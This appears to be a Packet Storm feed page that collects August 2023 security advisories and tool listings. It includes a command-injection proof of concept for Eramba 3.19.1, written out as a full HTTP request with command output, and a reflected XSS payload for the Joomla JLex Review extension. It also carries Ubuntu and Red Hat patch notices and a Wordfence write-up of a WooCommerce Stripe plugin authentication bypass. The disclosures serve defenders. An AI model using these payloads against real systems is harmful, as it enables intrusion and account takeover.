Eramba version 3.19.1 suffers from a remote command execution vulnerability.

    # Trovent Security Advisory 2303-01 ######################################Authenticated remote code execution in Eramba#############################################Overview########Advisory ID: TRSA-2303-01Advisory version: 1.0Advisory status: PublicAdvisory URL: https://trovent.io/security-advisory-2303-01Affected product: ErambaAffected version: 3.19.1 (Enterprise and Community edition)Vendor: Eramba Limited, https://www.eramba.orgCredits: Trovent Security GmbH, Sergey MakarovDetailed description####################Eramba is a web application for managing Governance, Risk, and Compliance (GRC).Trovent Security GmbH discovered that the Eramba web application allows remotecode execution for authenticated users.A possible attacker is able to modify the parameter "path" in the URL"https://hostname/settings/download-test-pdf?path=" to execute arbitrarycommands in the context of the user account the application is running in.To see the output of the executed command in the HTTP response, debug mode hasto be enabled.Severity: HighCVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)CVE ID: CVE-2023-36255CWE ID: CWE-94Proof of concept################HTTP request:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1Host: [redacted]Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://[redacted]/settingsUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP response:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP/1.1 500 Internal Server ErrorDate: Fri, 31 Mar 2023 12:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Access-Control-Allow-Origin: *Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="test.pdf"X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 2033469<!DOCTYPE html><html><head>    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>        Error: The exit status code '127' says something went wrong:stderr: "sh: 1: --dpi: not found"stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host       valid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    link/ether [redacted] brd ff:ff:ff:ff:ff:ff    inet [redacted] brd [redacted] scope global ens33       valid_lft forever preferred_lft forever    inet6 [redacted] scope link       valid_lft forever preferred_lft forever"command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html''/tmp/knp_snappy6426d423104587.46971034.pdf'.    </title>[...]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Solution / Workaround#####################The vendor released a fixed version of Eramba.Fixed in version 3.19.2.History#######2023-03-31: Vulnerability found2023-04-04: Vendor contacted2023-04-17: Vendor confirmed vulnerability2023-04-20: Vendor released fixed version2023-05-25: Trovent verified remediation of the vulnerability2023-06-13: CVE ID requested2023-07-28: CVE ID received2023-08-01: Advisory published

Eramba 3.19.1 Remote Command Execution

Ubuntu Security Notice 6266-1 - Zac Sims discovered that librsvg incorrectly handled decoding URLs. A remote attacker could possibly use this issue to read arbitrary files by using an include element.

==========================================================================  
Ubuntu Security Notice USN-6266-1  
August 01, 2023

librsvg vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

librsvg could be made to expose sensitive information.

Software Description:  
- librsvg: renderer library for SVG files

Details:

Zac Sims discovered that librsvg incorrectly handled decoding URLs. A  
remote attacker could possibly use this issue to read arbitrary files by  
using an include element.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   librsvg2-2                      2.54.5+dfsg-1ubuntu2.1

Ubuntu 22.04 LTS:  
   librsvg2-2                      2.52.5+dfsg-3ubuntu0.2

Ubuntu 20.04 LTS:  
   librsvg2-2                      2.48.9-1ubuntu0.20.04.4

After a standard system update you need to restart your session to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6266-1  
   CVE-2023-38633

Package Information:  
   https://launchpad.net/ubuntu/+source/librsvg/2.54.5+dfsg-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/librsvg/2.52.5+dfsg-3ubuntu0.2  
   https://launchpad.net/ubuntu/+source/librsvg/2.48.9-1ubuntu0.20.04.4

Ubuntu Security Notice USN-6266-1

Joomla JLex Review extension version 6.0.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 01/08/2023# Vendor: JLexArt# Vendor Homepage: https://jlexart.com/# Software Link: https://extensions.joomla.org/extension/jlex-review/# Demo: https://jlexreview.jlexart.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /URL parameter is vulnerable to XSShttps://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1XSS Payloads:itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn[-] Done

Joomla JLex Review 6.0.1 Cross Site Scripting

Red Hat Security Advisory 2023-4411-01 - CJose is C library implementing the Javascript Object Signing and Encryption.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cjose security update  
Advisory ID:       RHSA-2023:4411-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4411  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-37464   
=====================================================================

1. Summary:

An update for cjose is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

CJose is C library implementing the Javascript Object Signing and  
Encryption (JOSE).

Security Fix(es):

* cjose: AES GCM decryption uses the Tag length from the actual  
Authentication Tag provided in the JWE (CVE-2023-37464)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2223295 - CVE-2023-37464 cjose: AES GCM decryption uses the Tag length from the actual Authentication Tag provided in the JWE

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
cjose-0.6.1-13.el9_2.src.rpm

aarch64:  
cjose-0.6.1-13.el9_2.aarch64.rpm  
cjose-debuginfo-0.6.1-13.el9_2.aarch64.rpm  
cjose-debugsource-0.6.1-13.el9_2.aarch64.rpm

ppc64le:  
cjose-0.6.1-13.el9_2.ppc64le.rpm  
cjose-debuginfo-0.6.1-13.el9_2.ppc64le.rpm  
cjose-debugsource-0.6.1-13.el9_2.ppc64le.rpm

s390x:  
cjose-0.6.1-13.el9_2.s390x.rpm  
cjose-debuginfo-0.6.1-13.el9_2.s390x.rpm  
cjose-debugsource-0.6.1-13.el9_2.s390x.rpm

x86_64:  
cjose-0.6.1-13.el9_2.i686.rpm  
cjose-0.6.1-13.el9_2.x86_64.rpm  
cjose-debuginfo-0.6.1-13.el9_2.i686.rpm  
cjose-debuginfo-0.6.1-13.el9_2.x86_64.rpm  
cjose-debugsource-0.6.1-13.el9_2.i686.rpm  
cjose-debugsource-0.6.1-13.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37464  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyRWiAAoJENzjgjWX9erEjIMP/0xpQ635s+ITt24tEptoI16V  
Y6xpeZQCgk7yv0YGHO7mHRtQVBOYhitZNEtFiglX/bT/wVitem4aVzh8LnW/7dit  
mzjIYYUYGDM7Z3lHF2blO2AGV/PSx7z87LXbqznqx4YNzD7r8Rrb9t5s/fhlIDDl  
6n5BevMdRfrb4ra3syzkqulvB4qvPfDMnimWipcJXT/LDSpCOPSeDi9SmhqJdWBT  
xyrNe9sr6KtXOyHAg93qHlZZ+aXjsI1hIQlmgeZqPIKtoeUbX/ubGugertip0NC8  
ve6XggZxWSomkQ9iFMA42of2kjnvkJbv8hmzezbIUZKGpU8A7Ul8bsqWrs/zpoo8  
pOLIcP10IyjzNQ1iT4TrM4sq9ML0RZFQW/5xGy5mBXS/O0NnpxjwTblg1/dIQaua  
oajhFyPay4o3gv9oPATngtIhdR1Icn/N8nEGkU2dvgmvwlxcd4c/fqBLtEfEQi2z  
hBCO8iVudQ6BCwruLFQY4wU1eVLaJf3MqHA7rAhuVDvczwK84Ra+O+o+D2B5l68t  
+ksIiX5mdIz8kmDOA///sF7PHjp/Zd+6I3O6Y+D4DjYhGr25h+lBXWL/MzSpSFzH  
IMnugRvf3T4fnNLFao8r4ozmWJZBGtOw9kyKkQbIBWNWumdxWvqoslTvuJVsklqR  
sKRaew4iVLV3I23QYfhy  
=KqMX  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4411-01

WordPress Stripe Payment Plugin for WooCommerce plugin versions 3.7.7 and below suffer from an authentication bypass vulnerability.

    Affected Plugin: Stripe Payment Plugin for WooCommercePlugin Slug: payment-gateway-stripe-and-woocommerce-integrationAffected Versions: <= 3.7.7CVE ID: CVE-2023-3162CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Lana Codes Fully Patched Version: 3.7.8The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.7.7. This is due to insufficient verification on the user being supplied during a Stripe checkout through the plugin. This allows unauthenticated attackers to log in as users who have orders, who are typically customers.Technical AnalysisThe Stripe Payment Plugin for WooCommerce, according to its settings, integrates various Stripe payment methods. By default, the plugin provides inline payments, which means that customers can complete their transactions directly on the WordPress website without being redirected to the Stripe website.However, the plugin also provides an option for checkout redirection. This means that customers can choose to be redirected to the Stripe website to complete their payment process. This allows them to have a familiar and secure payment experience on the Stripe platform. To enable the checkout redirection option, you would need to configure the plugin settings accordingly.Examining the code reveals that Stripe Checkout has an order cancellation link. If the customer cancels the payment, they will be returned to the WordPress website.[VIEW THIS CODE SNIPPET ON THE BLOG] The vulnerable 'eh_spg_stripe_cancel_order' functionIf the link contains the ‘createaccount’ parameter and its value is ‘true’, the plugin will log the customer in based on the order id, without any authentication. This means that it is possible to create a link that automatically logs into any user account associated with an order.An attacker is limited to what users they can log in as due to the fact that it is only possible to login as a user with an order. Considering the requirement of an order, in most cases an attacker will only be able to log in as a customer-level user. However, it is common for shop managers or administrators to create test orders in order to verify order functionality. In these cases there is a chance that by exploiting the authentication bypass vulnerability, an attacker can gain access to an administrative user account, or another higher-level user account.The normal order process looks like this:woo-stripe-checkout-howto-wordfence The exploit process looks like this:woo-stripe-checkout-exploit-howto-wordfence Disclosure TimelineJune 8, 2023 – Discovery of the Authentication Bypass vulnerability in Stripe Payment Plugin for WooCommerce.June 8, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.June 9, 2023 – The vendor confirms the inbox for handling the discussion.June 9, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.June 13, 2023 – A fully patched version of the plugin, 3.7.8, is released.June 19, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. Note that we delayed the firewall rule to prevent completely breaking the plugin’s core functionality as it was not being actively exploited.July 19, 2023 – Wordfence Free users receive the same protection.ConclusionIn this blog post, we have detailed an Authentication Bypass vulnerability within the Stripe Payment Plugin for WooCommerce plugin affecting versions 3.7.7 and earlier. This vulnerability allows threat actors to bypass authentication and gain access to the accounts of users who have orders. The vulnerability has been fully addressed in version 3.7.8 of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of Stripe Payment Plugin for WooCommerce.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 19, 2023. Sites still using the free version of Wordfence will receive the same protection on July 19, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress Stripe Payment Plugin For WooCommerce 3.7.7 Authentication Bypass

Red Hat Security Advisory 2023-4410-01 - The mod_auth_openidc is an OpenID Connect authentication module for Apache HTTP Server. It enables an Apache HTTP Server to operate as an OpenID Connect Relying Party and/or OAuth 2.0 Resource Server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: mod_auth_openidc:2.3 security update  
Advisory ID:       RHSA-2023:4410-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4410  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-37464   
=====================================================================

1. Summary:

An update for the mod_auth_openidc:2.3 module is now available for Red Hat  
Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64

3. Description:

The mod_auth_openidc is an OpenID Connect authentication module for Apache  
HTTP Server. It enables an Apache HTTP Server to operate as an OpenID  
Connect Relying Party and/or OAuth 2.0 Resource Server.

Security Fix(es):

* cjose: AES GCM decryption uses the Tag length from the actual  
Authentication Tag provided in the JWE (CVE-2023-37464)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2223295 - CVE-2023-37464 cjose: AES GCM decryption uses the Tag length from the actual Authentication Tag provided in the JWE

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
cjose-0.6.1-3.module+el8.2.0+19461+3a40b6ee.src.rpm  
mod_auth_openidc-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.src.rpm

x86_64:  
cjose-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
mod_auth_openidc-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
cjose-0.6.1-3.module+el8.2.0+19461+3a40b6ee.src.rpm  
mod_auth_openidc-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.src.rpm

ppc64le:  
cjose-0.6.1-3.module+el8.2.0+19461+3a40b6ee.ppc64le.rpm  
cjose-debuginfo-0.6.1-3.module+el8.2.0+19461+3a40b6ee.ppc64le.rpm  
cjose-debugsource-0.6.1-3.module+el8.2.0+19461+3a40b6ee.ppc64le.rpm  
cjose-devel-0.6.1-3.module+el8.2.0+19461+3a40b6ee.ppc64le.rpm  
mod_auth_openidc-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.ppc64le.rpm  
mod_auth_openidc-debuginfo-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.ppc64le.rpm  
mod_auth_openidc-debugsource-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.ppc64le.rpm

x86_64:  
cjose-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
mod_auth_openidc-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
cjose-0.6.1-3.module+el8.2.0+19461+3a40b6ee.src.rpm  
mod_auth_openidc-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.src.rpm

x86_64:  
cjose-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.2.0+19461+3a40b6ee.x86_64.rpm  
mod_auth_openidc-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-4.module+el8.2.0+6919+ac02cfd2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37464  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyRWeAAoJENzjgjWX9erEOZwP/jOe/UdQ7hI9eRrC8R1i3bcg  
14NNzE/6BD/UcY/o+XdeXcXqRxwymcHh1PHbTFVxvMEVP5AwXgS54QvQ+4Dcc5br  
PCMOSYbkeo8ZpaipSSw3f1EuJ3ERzql30KuX2OW/eOLksYpLI77MWVdNI/mxGohw  
dyaVyBUsHsVD3pmtwESjYOZOrZAAi0F+KnRLrUDGFNLMvdFGfca+fSfJp61gyO9A  
Dzos1lSkW+2AEznza+aP4It+7AnvwQlPRLOZH/+MQeKDLsLqb8G4DUKwb4R5jIjz  
gg42ceLJRts7xfDyEWnELNQlPb1OmYdhZjswqiEPhfnnz33blft9QKzJ3y5NxfZl  
SlSTuj4Rb0Gv3rB4sxpH2+iADG1dDOYfumOFhXtAEyNdWmRg3OCJWpaGICCQELph  
nyM+FV1LEWFdLumQoqOUi8/jTfF9fSLq+EVsPrFviteHSBqxI0hKgMfjcUGwNs9C  
3TRO6yog99Pht6kj1NBH62qwA6m8Dy6Ey8NzptF6koejjmt8Kx94hr0DdyckcLK8  
TSTg6hBidbOAspRtZQ2Xt+rT7eRbv7+pisJ62dBmtyN0DZDmwA2ZNkN+xSnsCnyv  
KjBFxCP4z0WA4htsIoKwKtMWNUXoXDffZd77ym0Lw+RnQLolZtz4nWbLHw+LG7XR  
8TsFHKzM3/MUZcPN6fkt  
=KZHz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4410-01

AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on server. It uses regular expressions for determining which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.

AIDE 0.18.6

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide. The 3.1.x series is the current major version of OpenSSL.

OpenSSL Toolkit 3.1.2

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide. The 3.x series is the current major version of OpenSSL.

OpenSSL Toolkit 3.0.10

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

Source

Packet Storm